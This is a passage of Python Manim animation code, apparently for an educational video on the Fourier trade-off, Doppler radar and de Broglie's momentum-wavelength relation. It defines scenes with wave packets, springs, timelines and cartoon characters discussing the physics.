shifted_graphs.move_to, fourier_graph, DOWN,
)
self.wait()
self.play(shifted_graphs.restore)
self.play(ReplacementTransform(
shifted_graphs, VGroup(sum_graph),
))
self.wait()
self.curr_fourier_graph = sum_graph
def echos_of_long_pure_signal_in_frequency_space(self):
curr_fourier_graph = self.curr_fourier_graph
f_max = self.frequency_axes.y_max
new_fourier_graph = self.frequency_axes.get_graph(
lambda x : f_max * np.exp(-100*(x-8)**2),
num_graph_points = 1000,
)
new_fourier_graph.set_color(PINK)
self.play(
FadeOut(curr_fourier_graph),
FadeIn(new_fourier_graph),
)
self.fourier_graph = new_fourier_graph
self.overlapping_frequencies_of_various_objects()
def concentrated_fourier_requires_long_time(self):
objects = self.objects
objects.restore()
object_movements = self.object_movements
self.n_pulse_singletons = 32
pulses = self.get_pulses()
randy = self.pi_creature
continual_anims = object_movements+pulses
self.play(FadeIn(randy))
self.add(*continual_anims)
self.play(randy.change, "angry", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))
for obj in objects
])
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
self.play(randy.change, "plain", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))
for obj in objects
])
self.wait()
###
def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):
graph = IntroduceDopplerRadar.get_frequency_pulse_graph(
self, x, freq, **kwargs
)
return graph
def get_pulse(self, dish, echo_object):
return RadarPulse(
dish, echo_object,
n_pulse_singletons = self.n_pulse_singletons,
frequency = self.pulse_frequency, # presumably intended; hard-coding 0.025 ignored the override set in use_short_pulse
speed = 5.0,
)
def get_pulses(self):
return [
self.get_pulse(
self.dish.copy().shift(0.01*obj.get_center()[0]*RIGHT), # *RIGHT assumed; shifting by a bare scalar would nudge every coordinate at once
obj
)
for obj in self.objects
]
def create_pi_creature(self):
randy = Randolph()
randy.scale(0.5).flip()
randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)
return randy
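# One copy of the Fourier graph per object, shifted right by 5 times the
# object's x-velocity (a stand-in for its Doppler shift) and clipped to the
# axes' range.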
def get_shifted_frequency_graphs(self, fourier_graph):
frequency_axes = self.frequency_axes
def get_func(v):
return lambda f : fourier_graph.underlying_function(np.clip(
f-5*v[0],
frequency_axes.x_min,
frequency_axes.x_max,
))
def get_graph(func):
return frequency_axes.get_graph(func)
shifted_graphs = VGroup(*list(map(
get_graph, list(map(get_func, self.object_velocities))
)))
shifted_graphs.match_style(fourier_graph)
return shifted_graphs
def get_sum_graph(self, axes, graphs):
def get_func(graph):
return graph.underlying_function
funcs = list(map(get_func, graphs))
return axes.get_graph(
lambda t : sum([func(t) for func in funcs]),
)
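# Summary animation: the time-side Gaussians exp(-5a(t - x)^2) sharpen exactly
# as the frequency-side Gaussians exp(-(5/a)(t - v)^2) spread, and vice versa,
# as the shared scale parameter a moves.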
class SummarizeFourierTradeoffForDoppler(Scene):
def construct(self):
time_axes = Axes(
x_min = 0, x_max = 12,
y_min = -0.5, y_max = 1,
)
time_axes.center().to_edge(UP, buff = LARGE_BUFF)
frequency_axes = time_axes.copy()
frequency_axes.next_to(time_axes, DOWN, buff = 2)
time_label = TextMobject("Time")
frequency_label = TextMobject("Frequency")
for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):
label.next_to(axes.get_right(), UP, SMALL_BUFF)
axes.add(label)
frequency_label.shift_onto_screen()
title = TextMobject("Fourier Trade-off")
title.next_to(time_axes, DOWN)
self.add(title)
#Position determines log of scale value for exponentials
a_mob = VectorizedPoint()
x_values = [3, 5, 6, 7, 8]
v_values = [5, 5.5, 5.75, 6.5, 7]
def get_top_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))
for x in x_values
])
graphs.set_color(WHITE)
graphs.color_using_background_image("blue_yellow_gradient")
return graphs
def get_bottom_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))
for v in v_values
])
graphs.set_color(RED)
return graphs
top_graphs = get_top_graphs()
bottom_graphs = get_bottom_graphs()
update_top_graphs = Mobject.add_updater(
top_graphs,
lambda g : Transform(g, get_top_graphs()).update(1)
)
update_bottom_graphs = Mobject.add_updater(
bottom_graphs,
lambda g : Transform(g, get_bottom_graphs()).update(1)
)
self.add(time_axes, frequency_axes)
self.add(update_top_graphs, update_bottom_graphs)
shift_vect = 2*RIGHT
for s in 1, -2, 1:
self.play(a_mob.shift, s*shift_vect, run_time = 3)
class MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):
pass
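# Historical framing: broadcasts ripple out from the Eiffel tower, de Broglie's
# portrait appears, a 1900-1935 timeline scrubs to his 1924 thesis, and a
# traveling wave packet makes its first appearance.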
class IntroduceDeBroglie(Scene):
CONFIG = {
"default_wave_frequency" : 1,
"wave_colors" : [BLUE_D, YELLOW],
"dispersion_factor" : 1,
"amplitude" : 1,
}
def construct(self):
text_scale_val = 0.8 # the stray trailing comma made this a tuple, breaking the scale() calls below
#Overlay real tower in video editor
eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)
picture = ImageMobject("de_Broglie")
picture.set_height(4)
picture.to_corner(UP+LEFT)
name = TextMobject("Louis de Broglie")
name.next_to(picture, DOWN)
picture.save_state()
picture.scale(0)
picture.move_to(eiffel_tower.get_top())
broadcasts = [
Broadcast(
eiffel_tower.get_top(),
big_radius = 10,
n_circles = 10,
lag_ratio = 0.9,
run_time = 7,
rate_func = squish_rate_func(smooth, a, a+0.3),
color = WHITE,
)
for a in np.linspace(0, 0.7, 3)
]
self.play(*broadcasts)
self.play(picture.restore)
self.play(Write(name))
self.wait()
#Time line
time_line = NumberLine(
x_min = 1900,
x_max = 1935,
tick_frequency = 1,
numbers_with_elongated_ticks = list(range(1900, 1941, 10)),
color = BLUE_D
)
time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)
time_line.add_numbers(*time_line.numbers_with_elongated_ticks)
time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)
year_to_words = {
1914 : "Wold War I begins",
1915 : "Einstein field equations",
1916 : "Lewis dot formulas",
1917 : "Not a lot of physics...because war",
1918 : "S'more Rutherford badassery",
1919 : "Eddington confirms general relativity predictions",
1920 : "World is generally stoked on general relativity",
1921 : "Einstein gets long overdue Nobel prize",
1922 : "Stern-Gerlach Experiment",
1923 : "Compton scattering observed",
1924 : "de Broglie's thesis"
}
arrow = Vector(DOWN, color = WHITE)
arrow.next_to(time_line.number_to_point(1914), UP)
words = TextMobject(year_to_words[1914])
words.scale(text_scale_val)
date = Integer(1914)
date.next_to(arrow, UP, LARGE_BUFF)
def get_year(alpha = 0):
return int(time_line.point_to_number(arrow.get_end()))
def update_words(words):
text = year_to_words.get(get_year(), "Hi there")
if text not in words.get_tex_string():
words.__init__(text)
words.scale(text_scale_val)
words.move_to(interpolate(
arrow.get_top(), date.get_bottom(), 0.5
))
update_words(words)
self.play(
FadeIn(time_line),
GrowArrow(arrow),
Write(words),
Write(date),
run_time = 1
)
self.wait()
self.play(
arrow.next_to, time_line.number_to_point(1924), UP,
ChangingDecimal(
date, get_year,
position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)
),
UpdateFromFunc(words, update_words),
run_time = 3,
)
self.wait()
#Transform time_line
line = time_line
self.play(
FadeOut(time_line.numbers),
VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,
*[
ApplyFunction(
lambda m : m.rotate(TAU/4).set_stroke(width = 0),
mob,
remover = True
)
for mob in time_line.tick_marks
]
)
#Wave function
particle = VectorizedPoint()
axes = Axes(x_min = -1, x_max = 10)
axes.match_width(line)
axes.shift(line.get_center() - axes.x_axis.get_center())
im_line = line.copy()
im_line.set_color(YELLOW)
wave_update_animation = self.get_wave_update_animation(
axes, particle, line, im_line
)
for x in range(3):
particle.move_to(axes.coords_to_point(-10, 0))
self.play(
ApplyMethod(
particle.move_to, axes.coords_to_point(22, 0),
rate_func=linear
),
wave_update_animation,
run_time = 3
)
self.wait()
###
def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):
line = Line(
axes.x_axis.get_left(),
axes.x_axis.get_right(),
)
if re_line is None:
re_line = line.copy()
re_line.set_color(self.wave_colors[0])
if im_line is None:
im_line = line.copy()
im_line.set_color(self.wave_colors[1])
lines = VGroup(im_line, re_line)
def update_lines(lines):
waves = self.get_wave_pair(axes, particle)
for line, wave in zip(lines, waves):
wave.match_style(line)
Transform(line, wave).update(1)
return UpdateFromFunc(lines, update_lines)
def get_wave(
self, axes, particle,
complex_to_real_func = lambda z : z.real,
freq = None,
**kwargs):
freq = freq or self.default_wave_frequency
k0 = 1./freq
t0 = axes.x_axis.point_to_number(particle.get_center())
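# Wave packet: a plane wave whose phase is offset by the dispersion term,
# under a Gaussian envelope centered at the particle's position t0. The
# envelope broadens as |t0| grows, which appears intended to mimic dispersion.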
def func(x):
dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))
wave_part = complex_to_real_func(np.exp(
complex(0, TAU*freq*(x-dispersion))
))
bell_part = np.exp(-dispersion*(x-t0)**2)
amplitude = self.amplitude
return amplitude*wave_part*bell_part
graph = axes.get_graph(func)
return graph
def get_wave_pair(self, axes, particle, colors = None, **kwargs):
if colors is None and "color" not in kwargs:
colors = self.wave_colors
return VGroup(*[
self.get_wave(
axes, particle,
C_to_R, color = color,
**kwargs
)
for C_to_R, color in zip(
[lambda z : z.imag, lambda z : z.real],
colors
)
])
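# States p = h * xi: momentum (blue) equals Planck's constant times the wave's
# spatial frequency xi (yellow), with dashed lines spaced one wavelength apart
# to mark that frequency.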
class ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):
CONFIG = {
"default_wave_frequency" : 2,
"dispersion_factor" : 0.25,
"p_color" : BLUE,
"xi_color" : YELLOW,
"amplitude" : 0.5,
}
def construct(self):
self.introduce_formula()
self.react_to_claim()
def introduce_formula(self):
formula = p, eq, h, xi = TexMobject("p", "=", "h", "\\xi")
formula.move_to(ORIGIN)
formula.scale(1.5)
word_shift_val = 1.75
p_words = TextMobject("Momentum")
p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)
p_arrow = Arrow(
p_words.get_bottom(), p.get_corner(UP+LEFT),
buff = SMALL_BUFF
)
added_p_words = TextMobject("(Classically $m \\times v$)")
added_p_words.move_to(p_words, DOWN)
VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)
xi_words = TextMobject("Spatial frequency")
added_xi_words = TextMobject("(cycles per unit \\emph{distance})")
xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)
xi_words.align_to(p_words)
xi_arrow = Arrow(
xi_words.get_bottom(), xi.get_corner(UP+RIGHT),
buff = SMALL_BUFF
)
added_xi_words.move_to(xi_words, DOWN)
added_xi_words.align_to(added_p_words, DOWN)
VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)
axes = Axes(
x_min = 0, x_max = FRAME_WIDTH,
y_min = -1, y_max = 1,
)
axes.center().to_edge(UP, buff = -0.5)
# axes.next_to(formula, RIGHT)
particle = VectorizedPoint()
wave_update_animation = self.get_wave_update_animation(axes, particle)
wave = wave_update_animation.mobject
wave[0].set_stroke(width = 0)
particle.next_to(wave, LEFT, buff = 2)
wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),
wave_update_animation,
run_time = 4,
rate_func=linear,
)
stopped_wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, xi_words),
wave_update_animation,
run_time = 3,
rate_func=linear,
)
n_v_lines = 10
v_lines = VGroup(*[
DashedLine(UP, DOWN)
for x in range(n_v_lines)
])
v_lines.match_color(xi)
v_lines.arrange(
RIGHT,
buff = float(axes.x_axis.unit_size)/self.default_wave_frequency
)
v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)
v_lines.align_to(wave)
v_lines.shift(0.125*RIGHT)
self.add(formula, wave)
self.play(
self.teacher.change, "raise_right_hand",
GrowArrow(p_arrow),
Succession(
Write, p_words,
ApplyMethod, p_words.next_to, added_p_words, UP,
),
FadeIn(
added_p_words,
rate_func = squish_rate_func(smooth, 0.5, 1),
run_time = 2,
),
wave_propagation
)
self.play(
Write(xi_words),
GrowArrow(xi_arrow),
self.get_student_changes("confused", "erm", "sassy"),
stopped_wave_propagation
)
self.play(
FadeIn(added_xi_words),
xi_words.next_to, added_xi_words, UP,
)
self.play(
LaggedStartMap(ShowCreation, v_lines),
self.get_student_changes(*["pondering"]*3)
)
self.play(LaggedStartMap(FadeOut, v_lines))
self.wait()
self.formula_labels = VGroup(
p_words, p_arrow, added_p_words,
xi_words, xi_arrow, added_xi_words,
)
self.set_variables_as_attrs(wave, wave_propagation, formula)
def react_to_claim(self):
formula_labels = self.formula_labels
full_formula = VGroup(self.formula, formula_labels)
full_formula.save_state()
wave_propagation = self.wave_propagation
student = self.students[2]
self.student_says(
"Hang on...",
bubble_kwargs = {"height" : 2, "width" : 2, "direction" : LEFT},
target_mode = "sassy",
student_index = 2,
added_anims = [self.teacher.change, "plain"]
)
student.bubble.add(student.bubble.content)
self.wait()
kwargs = {
"path_arc" : TAU/4,
"lag_ratio" : 0.7, # duplicate "lag_ratio" key removed; this later value was the one taking effect
"run_time" : 1.5,
}
self.play(
full_formula.scale, 0,
full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,
Animation(student.bubble),
**kwargs
)
self.play(full_formula.restore, Animation(student.bubble), **kwargs)
wave_propagation.update_config(
rate_func = lambda a : interpolate(0.35, 1, a)
)
self.play(
wave_propagation,
RemovePiCreatureBubble(student, target_mode = "confused"),
)
wave_propagation.update_config(rate_func = lambda t : t)
self.student_says(
"Physics is \\\\ just weird",
bubble_kwargs = {"height" : 2.5, "width" : 3},
target_mode = "shruggie",
student_index = 0,
added_anims = [ApplyMethod(full_formula.shift, UP)]
)
self.wait()
self.play(
wave_propagation,
ApplyMethod(full_formula.shift, DOWN),
FadeOut(self.students[0].bubble),
FadeOut(self.students[0].bubble.content),
self.get_student_changes(*3*["pondering"]),
self.teacher.change, "pondering",
)
self.play(wave_propagation)
class AskPhysicists(PiCreatureScene):
def construct(self):
morty, physy1, physy2, physy3 = self.pi_creatures
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"\\xi" : YELLOW,
})
formula.scale(1.5)
formula.to_edge(UP)
formula.save_state()
formula.shift(DOWN)
formula.fade(1)
self.play(formula.restore)
self.pi_creature_says(
morty, "So...why?",
target_mode = "maybe"
)
self.wait(2)
self.play(
RemovePiCreatureBubble(morty),
PiCreatureSays(
physy2,
"Take the Schrödinger equation \\\\ with $H = \\frac{p^2}{2m}+V(x)$",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy1,
"Even classically position and \\\\ momentum are conjugate",
target_mode = "surprised",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy3,
"Consider special relativity \\\\ together with $E = hf$",
target_mode = "hooray",
bubble_kwargs = {"fill_opacity" : 0.9},
),
morty.change, "guilty"
)
self.wait(2)
###
def create_pi_creatures(self):
scale_factor = 0.85
morty = Mortimer().flip()
morty.scale(scale_factor)
morty.to_corner(DOWN+LEFT)
physies = VGroup(*[
PiCreature(color = c).flip()
for c in (GREY, LIGHT_GREY, DARK_GREY)
])
physies.arrange(RIGHT, buff = MED_SMALL_BUFF)
physies.scale(scale_factor)
physies.to_corner(DOWN+RIGHT)
self.add(physies)
return VGroup(morty, *physies)
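# A moving reference frame changes the wave you see: as the camera locks onto
# the sliding screen rectangle, the wave number k is shifted, trading temporal
# frequency for spatial frequency.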
class SortOfDopplerEffect(PiCreatureScene):
CONFIG = {
"omega" : np.pi,
"arrow_spacing" : 0.25,
}
def setup(self):
PiCreatureScene.setup(self)
rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)
rect.set_stroke(width = 0)
self.camera = MovingCamera(
rect, **self.camera_config
)
def construct(self):
screen_rect = self.screen_rect
#x-coordinate gives time
t_tracker = VectorizedPoint()
#x-coordinate gives wave number
k_tracker = VectorizedPoint(2*RIGHT)
always_shift(t_tracker, RIGHT, 1)
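# One frame of the wave 0.5*cos(omega*t - k*x), drawn as a graph plus sampled
# arrows; its color interpolates from blue toward red as the wave number k grows.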
def get_wave():
t = t_tracker.get_center()[0]
k = k_tracker.get_center()[0]
omega = self.omega
color = interpolate_color(
BLUE, RED, (k-2)/2.0
)
func = lambda x : 0.5*np.cos(omega*t - k*x)
graph = FunctionGraph(
func,
x_min = -5*FRAME_X_RADIUS,
x_max = FRAME_X_RADIUS,
color = color,
)
return VGroup(graph, *[
Arrow(
x*RIGHT, x*RIGHT + func(x)*UP,
color = color
)
for x in np.arange(
-4*FRAME_X_RADIUS, FRAME_X_RADIUS,
self.arrow_spacing
)
])
wave = get_wave()
wave_update = Mobject.add_updater(
wave, lambda w : Transform(w, get_wave()).update(1)
)
rect = ScreenRectangle(height = 2)
rect.to_edge(RIGHT)
always_shift(rect, LEFT, 1)
rect_movement = rect
randy = self.pi_creature
randy_look_at = Mobject.add_updater(
randy, lambda r : r.look_at(rect)
)
ref_frame1 = TextMobject("Reference frame 1")
# ref_frame1.next_to(randy, UP, aligned_edge = LEFT)
ref_frame1.to_edge(UP)
ref_frame2 = TextMobject("Reference frame 2")
ref_frame2.next_to(rect, UP)
# ref_frame2.set_fill(opacity = 0)
ref_frame2_follow = Mobject.add_updater(
ref_frame2, lambda m : m.next_to(rect, UP)
)
ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)
self.add(
t_tracker, wave_update, rect_movement, randy_look_at,
ref_frame2_follow, ref_frame_1_continual_anim
)
self.add(ref_frame1)
self.play(randy.change, "pondering")
self.wait(4)
start_height = screen_rect.get_height()
start_center = screen_rect.get_center()
self.play(
UpdateFromAlphaFunc(
screen_rect,
lambda m, a : m.move_to(
interpolate(start_center, rect.get_center(), a)
)
),
k_tracker.shift, 2*RIGHT,
)
self.play(
MaintainPositionRelativeTo(
screen_rect, rect,
run_time = 4
),
)
self.play(
screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,
k_tracker.shift, 2*LEFT,
)
#Frequency words
temporal_frequency = TextMobject("Temporal", "frequency")
spatial_frequency = TextMobject("Spatial", "frequency")
temporal_frequency.move_to(screen_rect).to_edge(UP)
spatial_frequency.next_to(temporal_frequency, DOWN)
cross = Cross(temporal_frequency[0])
time = TextMobject("Time")
space = TextMobject("Space")
time.next_to(temporal_frequency, RIGHT, buff = 2)
space.next_to(time, DOWN)
space.align_to(spatial_frequency)
self.play(FadeIn(temporal_frequency))
self.play(ShowCreation(cross))
self.play(Write(spatial_frequency))
self.wait()
self.play(FadeIn(time), FadeIn(space))
self.play(
Transform(time, space),
Transform(space, time),
lag_ratio = 0.5,
run_time = 1,
)
self.play(FadeOut(time), FadeOut(space))
self.wait(3)
###
def create_pi_creature(self):
return Randolph().scale(0.5).to_corner(DOWN+LEFT)
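# Mechanical metaphor: a row of springs whose lengths oscillate as a traveling
# wave; zooming into a frame that moves with the pattern shifts the wave number
# k, echoing the previous scene.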
class HangingWeightsScene(MovingCameraScene):
CONFIG = {
"frequency" : 0.5,
"ceiling_radius" : 3*FRAME_X_RADIUS,
"n_springs" : 72,
"amplitude" : 0.6,
"spring_radius" : 0.15,
}
def construct(self):
self.setup_springs()
self.setup_weights()
self.introduce()
self.show_analogy_with_electron()
self.metaphor_for_something()
self.moving_reference_frame()
def setup_springs(self):
ceiling = self.ceiling = Line(LEFT, RIGHT)
ceiling.scale(self.ceiling_radius)
ceiling.to_edge(UP, buff = LARGE_BUFF)
self.add(ceiling)
def get_spring(alpha, height = 2):
t_max = 6.5
r = self.spring_radius
s = (height - r)/(t_max**2)
spring = ParametricFunction(
lambda t : op.add(
r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),
s*((t_max - t)**2)*DOWN,
),
t_min = 0, t_max = t_max,
color = WHITE,
stroke_width = 2,
)
spring.alpha = alpha
spring.move_to(ceiling.point_from_proportion(alpha), UP)
spring.color_using_background_image("grey_gradient")
return spring
alphas = np.linspace(0, 1, self.n_springs)
springs = self.springs = VGroup(*list(map(get_spring, alphas)))
k_tracker = self.k_tracker = VectorizedPoint()
t_tracker = self.t_tracker = VectorizedPoint()
always_shift(t_tracker, RIGHT, 1)
self.t_tracker_walk = t_tracker
equilibrium_height = springs.get_height()
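# Each spring's rest length is modulated by A*cos(TAU*f*t - k*x): a standing
# oscillation while k = 0 that becomes a traveling wave once k is shifted.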
def update_springs(springs):
for spring in springs:
k = k_tracker.get_center()[0]
t = t_tracker.get_center()[0]
f = self.frequency
x = spring.get_top()[0]
A = self.amplitude
d_height = A*np.cos(TAU*f*t - k*x)
new_spring = get_spring(spring.alpha, 2+d_height)
Transform(spring, new_spring).update(1)
spring_update_anim = Mobject.add_updater(springs, update_springs)
self.spring_update_anim = spring_update_anim
spring_update_anim.update(0)
self.play(
ShowCreation(ceiling),
LaggedStartMap(ShowCreation, springs)
)
def setup_weights(self):
weights = self.weights = VGroup()
weight_anims = []
for spring in self.springs:
x = spring.get_top()[0]
mass = np.exp(-0.1*x**2)
weight = Circle(radius = 0.15)
weight.start_radius = 0.15
weight.target_radius = 0.25*mass #For future update
weight.spring = spring
weight_anim = Mobject.add_updater(
weight, lambda w : w.move_to(w.spring.get_bottom())
)
weight_anim.update(0)
weight_anims.append(weight_anim)
weights.add(weight)
weights.set_fill(opacity = 1)
weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)
weights.set_stroke(WHITE, 1)
self.play(LaggedStartMap(GrowFromCenter, weights))
self.add(self.t_tracker_walk)
self.add(self.spring_update_anim)
self.add(*weight_anims)
def introduce(self):
arrow = Arrow(4*LEFT, LEFT)
arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))
arrows.set_color(WHITE)
self.wait(3)
self.play(*list(map(GrowArrow, arrows)))
self.play(*[
UpdateFromAlphaFunc(
weight, lambda w, a : w.set_width(
2*interpolate(w.start_radius, w.target_radius, a)
),
run_time = 2
)
for weight in self.weights
])
self.play(FadeOut(arrows))
self.wait(3)
def show_analogy_with_electron(self):
words = TextMobject(
"Analogous to the energy of a particle \\\\",
"(in the sense of $E=mc^2$)"
)
words.move_to(DOWN)
self.play(Write(words))
self.wait(3)
self.play(FadeOut(words))
def metaphor_for_something(self):
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(3.5)
de_broglie.to_corner(DOWN+RIGHT)
words = TextMobject("""
If a photon's energy is carried as a wave, \\\\
is this true for any particle?
""")
words.next_to(de_broglie, LEFT)
einstein = ImageMobject("Einstein")
einstein.match_height(de_broglie)
einstein.to_corner(DOWN+LEFT)
for picture in de_broglie, einstein:
picture.backdrop = Rectangle()
picture.backdrop.replace(picture, stretch = True)
picture.backdrop.set_fill(BLACK, 1)
picture.backdrop.set_stroke(BLACK, 0)
self.play(
Animation(de_broglie.backdrop, remover = True),
FadeIn(de_broglie)
)
self.play(Write(words))
self.wait(7)
self.play(
FadeOut(words),
Animation(einstein.backdrop, remover = True),
FadeIn(einstein)
)
self.wait(2)
self.de_broglie = de_broglie
self.einstein = einstein
def moving_reference_frame(self):
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect_movement = always_shift(rect, direction = LEFT, rate = 2)
camera_frame = self.camera_frame
self.add(rect)
self.play(
Animation(self.de_broglie.backdrop, remover = True),
FadeOut(self.de_broglie),
Animation(self.einstein.backdrop, remover = True),
FadeOut(self.einstein),
)
self.play(camera_frame.scale, 3, {"about_point" : 2*UP})
self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)
self.add(rect_movement)
self.wait(3)
def zoom_into_reference_frame():
original_height = camera_frame.get_height()
original_center = camera_frame.get_center()
self.play(
UpdateFromAlphaFunc(
camera_frame, lambda c, a : c.set_height(
interpolate(original_height, 0.95*rect.get_height(), a)
).move_to(
interpolate(original_center, rect.get_center(), a)
)
),
ApplyMethod(self.k_tracker.shift, RIGHT)
)
self.play(MaintainPositionRelativeTo(
camera_frame, rect,
run_time = 6
))
self.play(
camera_frame.set_height, original_height,
camera_frame.move_to, original_center,
ApplyMethod(self.k_tracker.shift, LEFT)
)
zoom_into_reference_frame()
self.wait()
self.play(
UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))
)
index = int(0.5*len(self.springs))
weights = VGroup(self.weights[index], self.weights[index+4])
flashes = list(map(self.get_peak_flash_anim, weights))
weights.save_state()
weights.set_fill(RED)
self.add(*flashes)
self.wait(5)
rect.align_to(camera_frame, RIGHT)
self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))
randy = Randolph(mode = "pondering")
randy.look(UP+RIGHT)
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(6)
de_broglie.next_to(4*DOWN, DOWN)
self.add(
Mobject.add_updater(
randy, lambda m : m.next_to(
rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,
).look_at(weights)
),
de_broglie
)
self.wait(2)
zoom_into_reference_frame()
self.wait(8)
###
def get_peak_flash_anim(self, weight):
mobject = Mobject() #Dummy
mobject.last_y = 0
mobject.last_dy = 0
mobject.curr_anim = None
mobject.curr_anim_time = 0
mobject.time_since_last_flash = 0
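# Fire a Flash whenever the weight's vertical velocity changes sign (i.e. at a
# peak or trough), rate-limited to at most one flash per half second.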
def update(mob, dt):
mob.time_since_last_flash += dt
point = weight.get_center()
y = point[1]
mob.dy = y - mob.last_y
different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)
if different_dy and mob.time_since_last_flash > 0.5:
mob.curr_anim = Flash(
VectorizedPoint(point),
flash_radius = 0.5,
line_length = 0.3,
run_time = 0.2,
)
mob.submobjects = [mob.curr_anim.mobject]
mob.time_since_last_flash = 0
mob.last_y = float(y)
mob.last_dy = float(mob.dy)
##
if mob.curr_anim:
mob.curr_anim_time += dt
if mob.curr_anim_time > mob.curr_anim.run_time:
mob.curr_anim = None
mob.submobjects = []
mob.curr_anim_time = 0
return
mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)
return Mobject.add_updater(mobject, update)
class MinutePhysicsWrapper(Scene):
def construct(self):
logo = ImageMobject("minute_physics_logo", invert = True)
logo.to_corner(UP+LEFT)
self.add(logo)
title = TextMobject("Minute Physics on special relativity")
title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)
screen_rect = ScreenRectangle()
screen_rect.set_width(title.get_width() + LARGE_BUFF)
screen_rect.next_to(title, DOWN)
self.play(ShowCreation(screen_rect))
self.play(Write(title))
self.wait(2)
class WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"So! What does \\\\ the Fourier trade-off \\\\ tell us?",
target_mode = "surprised",
bubble_kwargs = {"width" : 4, "height" : 3}
)
self.change_student_modes(*["thinking"]*3)
self.wait(4)
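# Plots a Gaussian wave packet A*cos(TAU*k*x)*exp(-a*(x - x0)^2), with
# A = a^0.25 (see get_wave_func below), against position, together with its
# Fourier transform against spatial frequency; a later beat labels that
# frequency as momentum via p = h*xi. Animating the width parameter `a`
# shows the trade-off: roughly speaking, a Gaussian of width sigma
# transforms to one of width proportional to 1/sigma.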
class FourierTransformOfWaveFunction(Scene):
CONFIG = {
"wave_stroke_width" : 3,
"wave_color" : BLUE,
}
def construct(self):
self.show_wave_packet()
self.take_fourier_transform()
self.show_correlations_with_pure_frequencies()
self.this_is_momentum()
self.show_tradeoff()
def setup(self):
self.x0_tracker = ValueTracker(-3)
self.k_tracker = ValueTracker(1)
self.a_tracker = ExponentialValueTracker(0.5)
def show_wave_packet(self):
axes = Axes(
x_min = 0, x_max = 12,
y_min = -1, y_max = 1,
y_axis_config = {
"tick_frequency" : 0.5
}
)
position_label = TextMobject("Position")
position_label.next_to(axes.x_axis.get_right(), UP)
axes.add(position_label)
axes.center().to_edge(UP, buff = LARGE_BUFF)
wave = self.get_wave(axes)
wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.add(axes, wave)
self.play(
self.x0_tracker.set_value, 5,
wave_update_animation,
run_time = 3,
)
self.wait()
self.wave_function = wave.underlying_function
self.wave_update_animation = wave_update_animation
self.wave = wave
self.axes = axes
def take_fourier_transform(self):
wave = self.wave
wave_update_animation = self.wave_update_animation
frequency_axes = Axes(
x_min = 0, x_max = 3,
x_axis_config = {
"unit_size" : 4,
"tick_frequency" : 0.25,
"numbers_with_elongated_ticks" : [1, 2]
},
y_min = -0.15,
y_max = 0.15,
y_axis_config = {
"unit_size" : 7.5,
"tick_frequency" : 0.05,
}
)
label = self.frequency_x_axis_label = TextMobject("Spatial frequency")
label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(label)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
label.shift_onto_screen()
def get_wave_function_fourier_graph():
return get_fourier_graph(
frequency_axes, self.get_wave_func(),
t_min = 0, t_max = 15,
)
fourier_graph = get_wave_function_fourier_graph()
self.fourier_graph_update_animation = UpdateFromFunc(
fourier_graph, lambda m : Transform(
m, get_wave_function_fourier_graph()
).update(1)
)
wave_copy = wave.copy()
wave_copy.generate_target()
wave_copy.target.move_to(fourier_graph, LEFT)
wave_copy.target.fade(1)
fourier_graph.save_state()
fourier_graph.move_to(wave, LEFT)
fourier_graph.fade(1)
arrow = Arrow(
self.axes.coords_to_point(5, -1),
